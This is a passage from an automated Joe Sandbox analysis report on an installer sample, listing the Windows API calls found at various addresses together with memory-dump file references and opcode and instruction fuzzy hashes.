                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                              • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                              • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                              • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,771B3420,004036EF), ref: 00405F46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: nsa
                                              • API String ID: 1716503409-2209301699
                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                              Strings
                                              • Error launching installer, xrefs: 004059E4
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                              • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                              • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98